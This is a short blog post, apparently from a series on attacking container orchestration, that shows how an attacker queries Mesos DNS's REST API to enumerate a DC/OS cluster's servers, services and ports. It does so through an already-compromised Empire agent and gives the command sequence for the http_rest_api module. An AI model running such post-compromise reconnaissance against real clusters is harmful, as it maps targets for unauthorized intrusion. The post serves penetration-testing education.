OWNerchestration - Mesos DNS Enumeration

Mesos also provides it’s own internal DNS service called “Mesos DNS” which is available via an HTTP REST API. This service is often the most useful service to query as it is often a one-stop shop for information on all servers, services, and associated TCP ports.

An attacker can interact with Mesos DNS via the following Empire modules…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/http_rest_api
(Empire: python/situational_awareness/network/http_rest_api)> set Target master.mesos
(Empire: python/situational_awareness/network/http_rest_api)> set Path /v1/enumerate
(Empire: python/situational_awareness/network/http_rest_api)> set Port 8123
(Empire: python/situational_awareness/network/http_rest_api)> execute

You can see a quick overview of creating an Empire pyInstaller ELF binary and performing recon within a DC/OS cluster in the following video…

Bryce KunzComment